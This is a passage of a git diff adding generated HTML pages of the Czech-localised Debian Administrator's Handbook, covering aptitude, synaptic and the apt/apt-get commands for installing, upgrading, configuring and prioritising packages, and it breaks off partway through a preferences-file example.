+			</div><div
+              class="para">
+				Beware, if some packages are marked as automatic and if no other package depends on them, they will be removed immediately (after a confirmation request).
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.13.6.9"></a>6.4.1.1. Managing Recommendations, Suggestions and Tasks</h4></div></div></div><div
+              class="para">
+					Another interesting feature of <code
+                class="command">aptitude</code> is the fact that it respects recommendations between packages while still giving users the choice not to install them on a case by case basis. For example, the <span
+                class="pkg pkg">gnome</span> package recommends <span
+                class="pkg pkg">brasero</span> (among others). When you select the former for installation, the latter will also be selected (and marked as automatic if not already installed on the system). Typing <span
+                class="keycap"><strong>g</strong></span> will make it obvious: <span
+                class="pkg pkg">brasero</span> appears on the summary screen of pending actions in the list of packages installed automatically to satisfy dependencies. However, you can decide not to install it by deselecting it before confirming the operations.
+				</div><div
+              class="para">
+					Note that this recommendation tracking feature does not apply to upgrades. For instance, if a new version of <span
+                class="pkg pkg">gnome</span> recommends a package that it did not recommend formerly, the package won't be marked for installation. However, it will be listed on the upgrade screen so that the administrator can still select it for installation.
+				</div><div
+              class="para">
+					Suggestions between packages are also taken into account, but in a manner adapted to their specific status. For example, since <span
+                class="pkg pkg">gnome</span> suggests <span
+                class="pkg pkg">empathy</span>, the latter will be displayed on the summary screen of pending actions (in the section of packages suggested by other packages). This way, it is visible and the administrator can decide whether to take the suggestion into account or not. Since it is only a suggestion and not a dependency or a recommendation, the package will not be selected automatically — its selection requires a manual intervention from the user (thus, the package will not be marked as automatic).
+				</div><div
+              class="para">
+					In the same spirit, remember that <code
+                class="command">aptitude</code> makes intelligent use of the concept of task. Since tasks are displayed as categories in the screens of packages lists, you can either select a full task for installation or removal, or browse the list of packages included in the task to select a smaller subset.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.13.6.10"></a>6.4.1.2. Better Solver Algorithms</h4></div></div></div><div
+              class="para">
+					To conclude this section, let's note that <code
+                class="command">aptitude</code> has more elaborate algorithms compared to <code
+                class="command">apt-get</code> when it comes to resolving difficult situations. When a set of actions is requested and when these combined actions would lead to an incoherent system, <code
+                class="command">aptitude</code> evaluates several possible scenarios and presents them in order of decreasing relevance. However, these algorithms are not failproof. Fortunately there is always the possibility to manually select the actions to perform. When the currently selected actions lead to contradictions, the upper part of the screen indicates a number of “broken” packages (and you can directly navigate to those packages by pressing <span
+                class="keycap"><strong>b</strong></span>). It is then possible to manually build a solution for the problems found. In particular, you can get access to the different available versions by simply selecting the package with <span
+                class="keycap"><strong>Enter</strong></span>. If the selection of one of these versions solves the problem, you should not hesitate to use the function. When the number of broken packages gets down to zero, you can safely go to the summary screen of pending actions for a last check before you apply them.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> <code
+                          class="command">aptitude</code>'s log</strong></p></div></div></div><div
+                class="para">
+					Like <code
+                  class="command">dpkg</code>, <code
+                  class="command">aptitude</code> keeps a trace of executed actions in its logfile (<code
+                  class="filename">/var/log/aptitude</code>). However, since both commands work at a very different level, you cannot find the same information in their respective logfiles. While <code
+                  class="command">dpkg</code> logs all the operations executed on individual packages step by step, <code
+                  class="command">aptitude</code> gives a broader view of high-level operations like a system-wide upgrade.
+				</div><div
+                class="para">
+					Beware, this logfile only contains a summary of operations performed by <code
+                  class="command">aptitude</code>. If other front-ends (or even <code
+                  class="command">dpkg</code> itself) are occasionally used, then <code
+                  class="command">aptitude</code>'s log will only contain a partial view of the operations, so you can't rely on it to build a trustworthy history of the system.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.13.7"></a>6.4.2. <code
+                    class="command">synaptic</code></h3></div></div></div><div
+            class="para">
+				<code
+              class="command">synaptic</code> is a graphical package manager for Debian which features a clean and efficient graphical interface based on GTK+/GNOME. Its many ready-to-use filters give fast access to newly available packages, installed packages, upgradable packages, obsolete packages and so on. If you browse through these lists, you can select the operations to be done on the packages (install, upgrade, remove, purge); these operations are not performed immediately, but put into a task list. A single click on a button then validates the operations, and they are performed in one go.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.9.13.7.3"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/synaptic.png"
+                  alt="synaptic package manager" /></div></div><p
+              class="title"><strong>Obrázek 6.2. <code
+                  class="command">synaptic</code> package manager</strong></p></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apt-cache.html"><strong>Předcházející</strong>6.3. The apt-cache Command</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.package-authentication.html"><strong>Další</strong>6.5. Checking Package Authenticity</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.apt-get.html b/tmp/cs-CZ/html/sect.apt-get.html
new file mode 100644
index 000000000..f63b93cdc
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.apt-get.html
@@ -0,0 +1,786 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">6.2. aptitude, apt-get, and apt Commands</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="prev"
+        href="apt.html"
+        title="Kapitola 6. Maintenance and Updates: The APT Tools" /><link
+        rel="next"
+        href="sect.apt-cache.html"
+        title="6.3. The apt-cache Command" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.apt-get.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="apt.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-cache.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.apt-get"></a>6.2. <code
+                  class="command">aptitude</code>, <code
+                  class="command">apt-get</code>, and <code
+                  class="command">apt</code> Commands</h2></div></div></div><a
+          id="id-1.9.11.2"
+          class="indexterm"></a><a
+          id="id-1.9.11.3"
+          class="indexterm"></a><a
+          id="id-1.9.11.4"
+          class="indexterm"></a><div
+          class="para">
+			APT is a vast project, whose original plans included a graphical interface. It is based on a library which contains the core application, and <code
+            class="command">apt-get</code> is the first front end — command-line based — which was developed within the project. <code
+            class="command">apt</code> is a second command-line based front end provided by APT which overcomes some design mistakes of <code
+            class="command">apt-get</code>.
+		</div><div
+          class="para">
+			Both tools are built on top of the same library and are thus very close but the default behaviour of <code
+            class="command">apt</code> has been improved for interactive use and to actually do what most users expect. APT's developers reserve the right to change the public interface of this tool to further improve it. On the opposite, the public interface of <code
+            class="command">apt-get</code> is well defined and will not change in any backwards incompatible way. It is thus the tool that you want to use when you need to script package installation requests.
+		</div><div
+          class="para">
+			Numerous other graphical interfaces then appeared as external projects: <code
+            class="command">synaptic</code>, <code
+            class="command">aptitude</code> (which includes both a text mode interface and a graphical one — even if not complete yet), <code
+            class="command">wajig</code>, etc. The most recommended interface, <code
+            class="command">apt</code>, is the one that we will use in the examples given in this section. Note however that <code
+            class="command">apt-get</code> and <code
+            class="command">aptitude</code> have a very similar command line syntax. When there are major differences between <code
+            class="command">apt</code>, <code
+            class="command">apt-get</code> and <code
+            class="command">aptitude</code>, these differences will be detailed.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.11.8"></a>6.2.1. Initialization</h3></div></div></div><div
+            class="para">
+				For any work with APT, the list of available packages needs to be updated; this can be done simply through <code
+              class="command">apt update</code>. Depending on the speed of your connection, the operation can take a while since it involves downloading a certain number of <code
+              class="filename">Packages</code>/<code
+              class="filename">Sources</code>/<code
+              class="filename">Translation-<em
+                class="replaceable">language-code</em></code> files, which have gradually become bigger and bigger as Debian has developed (at least 10 MB of data for the <code
+              class="literal">main</code> section). Of course, installing from a CD-ROM set does not require any downloading — in this case, the operation is very fast.
+			</div><a
+            id="id-1.9.11.8.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.8.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.8.5"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.9.11.9"></a>6.2.2. Installing and Removing</h3></div></div></div><a
+            id="id-1.9.11.9.2"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.5"
+            class="indexterm"></a><div
+            class="para">
+				With APT, packages can be added or removed from the system, respectively with <code
+              class="command">apt install <em
+                class="replaceable">package</em></code> and <code
+              class="command">apt remove <em
+                class="replaceable">package</em></code>. In both cases, APT will automatically install the necessary dependencies or delete the packages which depend on the package that is being removed. The <code
+              class="command">apt purge <em
+                class="replaceable">package</em></code> command involves a complete uninstallation — the configuration files are also deleted.
+			</div><a
+            id="id-1.9.11.9.7"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.8"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.9"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.10"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.11"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.12"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.13"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.14"
+            class="indexterm"></a><a
+            id="id-1.9.11.9.15"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Installing the same selection of packages several times</strong></p></div></div></div><div
+              class="para">
+				It can be useful to systematically install the same list of packages on several computers. This can be done quite easily.
+			</div><div
+              class="para">
+				First, retrieve the list of packages installed on the computer which will serve as the “model” to copy.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg --get-selections &gt;pkg-list</code></strong></pre><div
+              class="para">
+				The <code
+                class="filename">pkg-list</code> file then contains the list of installed packages. Next, transfer the <code
+                class="filename">pkg-list</code> file onto the computers you want to update and use the following commands:
+			</div><pre
+              class="screen">## Update dpkg's database of known packages
+# <strong
+                class="userinput"><code>avail=`mktemp`</code></strong>
+# <strong
+                class="userinput"><code>apt-cache dumpavail &gt; "$avail"</code></strong>
+# <strong
+                class="userinput"><code>dpkg --merge-avail "$avail"</code></strong>
+# <strong
+                class="userinput"><code>rm -f "$avail"</code></strong>
+## Update dpkg's selections
+# <strong
+                class="userinput"><code>dpkg --set-selections &lt; pkg-list</code></strong>
+## Ask apt-get to install the selected packages
+# <strong
+                class="userinput"><code>apt-get dselect-upgrade</code></strong></pre><div
+              class="para">
+				The first commands records the list of available packages in the dpkg database, then <code
+                class="command">dpkg --set-selections</code> restores the selection of packages that you wish to install, and the <code
+                class="command">apt-get</code> invocation executes the required operations! <code
+                class="command">aptitude</code> does not have this command.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Removing and installing at the same time</strong></p></div></div></div><div
+              class="para">
+				It is possible to ask <code
+                class="command">apt</code> (or <code
+                class="command">apt-get</code>, or <code
+                class="command">aptitude</code>) to install certain packages and remove others on the same command line by adding a suffix. With an <code
+                class="command">apt install</code> command, add “<code
+                class="literal">-</code>” to the names of the packages you wish to remove. With an <code
+                class="command">apt remove</code> command, add “<code
+                class="literal">+</code>” to the names of the packages you wish to install.
+			</div><div
+              class="para">
+				The next example shows two different ways to install <em
+                class="replaceable">package1</em> and to remove <em
+                class="replaceable">package2</em>.
+			</div><pre
+              class="screen"># <strong
+                class="userinput"><code>apt install <em
+                    class="replaceable">package1</em> <em
+                    class="replaceable">package2-</em></code></strong>
+[...]
+# <strong
+                class="userinput"><code>apt remove <em
+                    class="replaceable">package1+</em> <em
+                    class="replaceable">package2</em></code></strong>
+[...]
+</pre><div
+              class="para">
+				This can also be used to exclude packages which would otherwise be installed, for example due to a <code
+                class="literal">Recommends</code>. In general, the dependency solver will use that information as a hint to look for alternative solutions.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> <code
+                        class="command">apt --reinstall</code> and <code
+                        class="command">aptitude reinstall</code></strong></p></div></div></div><a
+              id="id-1.9.11.9.18.2"
+              class="indexterm"></a><div
+              class="para">
+				The system can sometimes be damaged after the removal or modification of files in a package. The easiest way to retrieve these files is to reinstall the affected package. Unfortunately, the packaging system finds that the latter is already installed and politely refuses to reinstall it; to avoid this, use the <code
+                class="literal">--reinstall</code> option of the <code
+                class="command">apt</code> and <code
+                class="command">apt-get</code> commands. The following command reinstalls <span
+                class="pkg pkg">postfix</span> even if it is already present:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>apt --reinstall install postfix</code></strong></pre><div
+              class="para">
+				The <code
+                class="command">aptitude</code> command line is slightly different, but achieves the same result with <code
+                class="command">aptitude reinstall postfix</code>.
+			</div><div
+              class="para">
+				The problem does not arise with <code
+                class="command">dpkg</code>, but the administrator rarely uses it directly.
+			</div><div
+              class="para">
+				Be careful! Using <code
+                class="command">apt --reinstall</code> to restore packages modified during an attack will certainly not recover the system as it was. <a
+                class="xref"
+                href="sect.dealing-with-compromised-machine.html">14.7 – „Dealing with a Compromised Machine“</a> details the necessary steps to take with a compromised system.
+			</div></div><div
+            class="para">
+				If the file <code
+              class="filename">sources.list</code> mentions several distributions, it is possible to give the version of the package to install. A specific version number can be requested with <code
+              class="command">apt install <em
+                class="replaceable">package</em>=<em
+                class="replaceable">version</em></code>, but indicating its distribution of origin (<span
+              class="distribution distribution">Stable</span>, <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span>) — with <code
+              class="command">apt install <em
+                class="replaceable">package</em>/<em
+                class="replaceable">distribution</em></code> — is usually preferred. With this command, it is possible to go back to an older version of a package (if for instance you know that it works well), provided that it is still available in one of the sources referenced by the <code
+              class="filename">sources.list</code> file. Otherwise the <code
+              class="literal">snapshot.debian.org</code> archive can come to the rescue (see sidebar <a
+              class="xref"
+              href="apt.html#sidebar.snapshot.debian.org"><span
+                class="emphasis"><em>GOING FURTHER</em></span> Old package versions: <code
+                class="literal">snapshot.debian.org</code></a>).
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.9.11.9.20"></a><p
+              class="title"><strong>Příklad 6.3. Installation of the <span
+                  class="distribution distribution">unstable</span> version of <span
+                  class="pkg pkg">spamassassin</span></strong></p><div
+              class="example-contents"><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>apt install spamassassin/unstable</code></strong></pre></div></div><div
+            class="para">
+				If the package to install has been made available to you under the form of a simple <code
+              class="filename">.deb</code> file without any associated package repository, it is still possible to use APT to install it together with its dependencies (provided that the dependencies are available in the configured repositories) with a simple command: <code
+              class="command">apt install ./<em
+                class="replaceable">path-to-the-package.deb</em></code>. The leading <code
+              class="literal">./</code> is important to make it clear that we are referring to a filename and not to the name of a package available in one of the repositories.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> The cache of <code
+                        class="filename">.deb</code> files</strong></p></div></div></div><div
+              class="para">
+				APT keeps a copy of each downloaded <code
+                class="filename">.deb</code> file in the directory <code
+                class="filename">/var/cache/apt/archives/</code>. In case of frequent updates, this directory can quickly take a lot of disk space with several versions of each package; you should regularly sort through them. Two commands can be used: <code
+                class="command">apt-get clean</code> entirely empties the directory; <code
+                class="command">apt-get autoclean</code> only removes packages which can no longer be downloaded (because they have disappeared from the Debian mirror) and are therefore clearly useless (the configuration parameter <code
+                class="literal">APT::Clean-Installed</code> can prevent the removal of <code
+                class="filename">.deb</code> files that are currently installed).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt-upgrade"></a>6.2.3. System Upgrade</h3></div></div></div><a
+            id="id-1.9.11.10.2"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.5"
+            class="indexterm"></a><div
+            class="para">
+				Regular upgrades are recommended, because they include the latest security updates. To upgrade, use <code
+              class="command">apt upgrade</code>, <code
+              class="command">apt-get upgrade</code> or <code
+              class="command">aptitude safe-upgrade</code> (of course after <code
+              class="command">apt update</code>). This command looks for installed packages which can be upgraded without removing any packages. In other words, the goal is to ensure the least intrusive upgrade possible. <code
+              class="command">apt-get</code> is slightly more demanding than <code
+              class="command">aptitude</code> or <code
+              class="command">apt</code> because it will refuse to install packages which were not installed beforehand.
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.apt-pdiff"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Incremental upgrade</strong></p></div></div></div><div
+              class="para">
+				As we explained earlier, the aim of the <code
+                class="command">apt update</code> command is to download for each package source the corresponding <code
+                class="filename">Packages</code> (or <code
+                class="filename">Sources</code>) file. However, even after a <code
+                class="command">xz</code> compression, these files can remain rather large (the <code
+                class="filename">Packages.xz</code> for the <span
+                class="foreignphrase"><em
+                  class="foreignphrase">main</em></span> section of <span
+                class="distribution distribution">Stretch</span> takes more than 6 MB). If you wish to upgrade regularly, these downloads can take up a lot of time.
+			</div><div
+              class="para">
+				To speed up the process APT can download “diff” files containing the changes since the previous update, as opposed to the entire file. To achieve this, official Debian mirrors distribute different files which list the differences between one version of the <code
+                class="filename">Packages</code> file and the following version. They are generated at each update of the archives and a history of one week is kept. Each of these “diff” files only takes a few dozen kilobytes for <span
+                class="distribution distribution">Unstable</span>, so that the amount of data downloaded by a weekly <code
+                class="command">apt update</code> is often divided by 10. For distributions like <span
+                class="distribution distribution">Stable</span> and <span
+                class="distribution distribution">Testing</span>, which change less, the gain is even more noticeable.
+			</div><div
+              class="para">
+				However, it can sometimes be of interest to force the download of the entire <code
+                class="filename">Packages</code> file, especially when the last upgrade is very old and when the mechanism of incremental differences would not contribute much. This can also be interesting when network access is very fast but when the processor of the machine to upgrade is rather slow, since the time saved on the download is more than lost when the computer calculates the new versions of these files (starting with the older versions and applying the downloaded differences). To do that, you can use the configuration parameter <code
+                class="literal">Acquire::Pdiffs</code> and set it to <code
+                class="literal">false</code>.
+			</div></div><div
+            class="para">
+				<code
+              class="command">apt</code> will generally select the most recent version number (except for packages from <span
+              class="distribution distribution">Experimental</span> and <span
+              class="distribution distribution">stable-backports</span>, which are ignored by default whatever their version number). If you specified <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span> in your <code
+              class="filename">sources.list</code>, <code
+              class="command">apt upgrade</code> will switch most of your <span
+              class="distribution distribution">Stable</span> system to <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span>, which might not be what you intended.
+			</div><div
+            class="para">
+				To tell <code
+              class="command">apt</code> to use a specific distribution when searching for upgraded packages, you need to use the <code
+              class="literal">-t</code> or <code
+              class="literal">--target-release</code> option, followed by the name of the distribution you want (for example: <code
+              class="command">apt -t stable upgrade</code>). To avoid specifying this option every time you use <code
+              class="command">apt</code>, you can add <code
+              class="literal">APT::Default-Release "stable";</code> in the file <code
+              class="filename">/etc/apt/apt.conf.d/local</code>.
+			</div><a
+            id="id-1.9.11.10.10"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.11"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.12"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.13"
+            class="indexterm"></a><a
+            id="id-1.9.11.10.14"
+            class="indexterm"></a><div
+            class="para">
+				For more important upgrades, such as the change from one major Debian version to the next, you need to use <code
+              class="command">apt full-upgrade</code>. With this instruction, <code
+              class="command">apt</code> will complete the upgrade even if it has to remove some obsolete packages or install new dependencies. This is also the command used by users who work daily with the Debian <span
+              class="distribution distribution">Unstable</span> release and follow its evolution day by day. It is so simple that it hardly needs explanation: APT's reputation is based on this great functionality.
+			</div><div
+            class="para">
+				Unlike <code
+              class="command">apt</code> and <code
+              class="command">aptitude</code>, <code
+              class="command">apt-get</code> doesn't know the <code
+              class="command">full-upgrade</code> command. Instead, you should use <code
+              class="command">apt-get dist-upgrade</code> (”distribution upgrade”), the historical and well-known command that <code
+              class="command">apt</code> and <code
+              class="command">aptitude</code> also accept for the convenience of users who got used to it.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt-config"></a>6.2.4. Configuration Options</h3></div></div></div><a
+            id="id-1.9.11.11.2"
+            class="indexterm"></a><a
+            id="id-1.9.11.11.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.11.4"
+            class="indexterm"></a><div
+            class="para">
+				Besides the configuration elements already mentioned, it is possible to configure certain aspects of APT by adding directives in a file of the <code
+              class="filename">/etc/apt/apt.conf.d/</code> directory. Remember for instance that it is possible for APT to tell <code
+              class="command">dpkg</code> to ignore file conflict errors by specifying <code
+              class="literal">DPkg::options { "--force-overwrite"; }</code>.
+			</div><div
+            class="para">
+				If the Web can only be accessed through a proxy, add a line like <code
+              class="literal">Acquire::http::proxy "http://<em
+                class="replaceable">yourproxy</em>:3128"</code>. For an FTP proxy, write <code
+              class="literal">Acquire::ftp::proxy "ftp://<em
+                class="replaceable">yourproxy</em>"</code>. To discover more configuration options, read the <span
+              class="citerefentry"><span
+                class="refentrytitle">apt.conf</span>(5)</span> manual page with the <code
+              class="command">man apt.conf</code> command (for details on manual pages, see <a
+              class="xref"
+              href="solving-problems.html#sect.manual-pages">7.1.1 – „Manual Pages“</a>).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.directory.d"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Directories ending in <code
+                        class="filename">.d</code></strong></p></div></div></div><a
+              id="id-1.9.11.11.7.2"
+              class="indexterm"></a><div
+              class="para">
+				Directories with a <code
+                class="filename">.d</code> suffix are used more and more often. Each directory represents a configuration file which is split over multiple files. In this sense, all of the files in <code
+                class="filename">/etc/apt/apt.conf.d/</code> are instructions for the configuration of APT. APT includes them in alphabetical order, so that the last ones can modify a configuration element defined in one of the first ones.
+			</div><div
+              class="para">
+				This structure brings some flexibility to the machine administrator and to the package maintainers. Indeed, the administrator can easily modify the configuration of the software by adding a ready-made file in the directory in question without having to change an existing file. Package maintainers use the same approach when they need to adapt the configuration of another software to ensure that it perfectly co-exists with theirs. The Debian policy explicitly forbids modifying configuration files of other packages — only users are allowed to do this. Remember that during a package upgrade, the user gets to choose the version of the configuration file that should be kept when a modification has been detected. Any external modification of the file would trigger that request, which would disturb the administrator, who is sure not to have changed anything.
+			</div><div
+              class="para">
+				Without a <code
+                class="filename">.d</code> directory, it is impossible for an external package to change the settings of a program without modifying its configuration file. Instead it must invite the user to do it themselves and lists the operations to be done in the file <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">package</em>/README.Debian</code>.
+			</div><div
+              class="para">
+				Depending on the application, the <code
+                class="filename">.d</code> directory is used directly or managed by an external script which will concatenate all the files to create the configuration file itself. It is important to execute the script after any change in that directory so that the most recent modifications are taken into account. In the same way, it is important not to work directly in the configuration file created automatically, since everything would be lost at the next execution of the script. The chosen method (<code
+                class="filename">.d</code> directory used directly or a file generated from that directory) is usually dictated by implementation constraints, but in both cases the gains in terms of configuration flexibility more than make up for the small complications that they entail. The Exim 4 mail server is an example of the generated file method: it can be configured through several files (<code
+                class="filename">/etc/exim4/conf.d/*</code>) which are concatenated into <code
+                class="filename">/var/lib/exim4/config.autogenerated</code> by the <code
+                class="command">update-exim4.conf</code> command.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt.priorities"></a>6.2.5. Managing Package Priorities</h3></div></div></div><div
+            class="para">
+				One of the most important aspects in the configuration of APT is the management of the priorities associated with each package source. For instance, you might want to extend one distribution with one or two newer packages from <span
+              class="distribution distribution">Testing</span>, <span
+              class="distribution distribution">Unstable</span> or <span
+              class="distribution distribution">Experimental</span>. It is possible to assign a priority to each available package (the same package can have several priorities depending on its version or the distribution providing it). These priorities will influence APT's behavior: for each package, it will always select the version with the highest priority (except if this version is older than the installed one and if its priority is less than 1000).
+			</div><a
+            id="id-1.9.11.12.3"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.4"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.5"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.6"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.7"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.8"
+            class="indexterm"></a><a
+            id="id-1.9.11.12.9"
+            class="indexterm"></a><div
+            class="para">
+				APT defines several default priorities. Each installed package version has a priority of 100. A non-installed version has a priority of 500 by default, but it can jump to 990 if it is part of the target release (defined with the <code
+              class="literal">-t</code> command-line option or the <code
+              class="literal">APT::Default-Release</code> configuration directive).
+			</div><div
+            class="para">
+				You can modify the priorities by adding entries in the <code
+              class="filename">/etc/apt/preferences</code> file with the names of the affected packages, their version, their origin and their new priority.
+			</div><div
+            class="para">
+				APT will never install an older version of a package (that is, a package whose version number is lower than the one of the currently installed package) except if its priority is higher than 1000. APT will always install the highest priority package which follows this constraint. If two packages have the same priority, APT installs the newest one (whose version number is the highest). If two packages of same version have the same priority but differ in their content, APT installs the version that is not installed (this rule has been created to cover the case of a package update without the increment of the revision number, which is usually required).
+			</div><div
+            class="para">
+				In more concrete terms, a package whose priority is less than 0 will never be installed. A package with a priority ranging between 0 and 100 will only be installed if no other version of the package is already installed. With a priority between 100 and 500, the package will only be installed if there is no other newer version installed or available in another distribution. A package of priority between 501 and 990 will only be installed if there is no newer version installed or available in the target distribution. With a priority between 990 and 1000, the package will be installed except if the installed version is newer. A priority greater than 1000 will always lead to the installation of the package even if it forces APT to downgrade to an older version.
+			</div><div
+            class="para">
+				When APT checks <code
+              class="filename">/etc/apt/preferences</code>, it first takes into account the most specific entries (often those specifying the concerned package), then the more generic ones (including for example all the packages of a distribution). If several generic entries exist, the first match is used. The available selection criteria include the package's name and the source providing it. Every package source is identified by the information contained in a <code
+              class="filename">Release</code> file that APT downloads together with the <code
+              class="filename">Packages</code> files. It specifies the origin (usually “Debian” for the packages of official mirrors, but it can also be a person's or an organization's name for third-party repositories). It also gives the name of the distribution (usually <span
+              class="distribution distribution">Stable</span>, <span
+              class="distribution distribution">Testing</span>, <span
+              class="distribution distribution">Unstable</span> or <span
+              class="distribution distribution">Experimental</span> for the standard distributions provided by Debian) together with its version (for example 9 for Debian <span
+              class="distribution distribution">Stretch</span>). Let's have a look at its syntax through some realistic case studies of this mechanism.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SPECIFIC CASE</em></span> Priority of <span
+                        class="distribution distribution">experimental</span></strong></p></div></div></div><a
+              id="id-1.9.11.12.15.2"
+              class="indexterm"></a><div
+              class="para">
+				If you listed <span
+                class="distribution distribution">Experimental</span> in your <code
+                class="filename">sources.list</code> file, the corresponding packages will almost never be installed because their default APT priority is 1. This is of course a specific case, designed to keep users from installing <span
+                class="distribution distribution">Experimental</span> packages by mistake. The packages can only be installed by typing <code
+                class="command">aptitude install <em
+                  class="replaceable">package</em>/experimental</code> — users typing this command can only be aware of the risks that they take. It is still possible (though <span
+                class="emphasis"><em>not</em></span> recommended) to treat packages of <span
+                class="distribution distribution">Experimental</span> like those of other distributions by giving them a priority of 500. This is done with a specific entry in <code
+                class="filename">/etc/apt/preferences</code>:
+			</div><div
+              class="informalexample"><pre
+                class="programlisting">Package: *
+Pin: release a=experimental
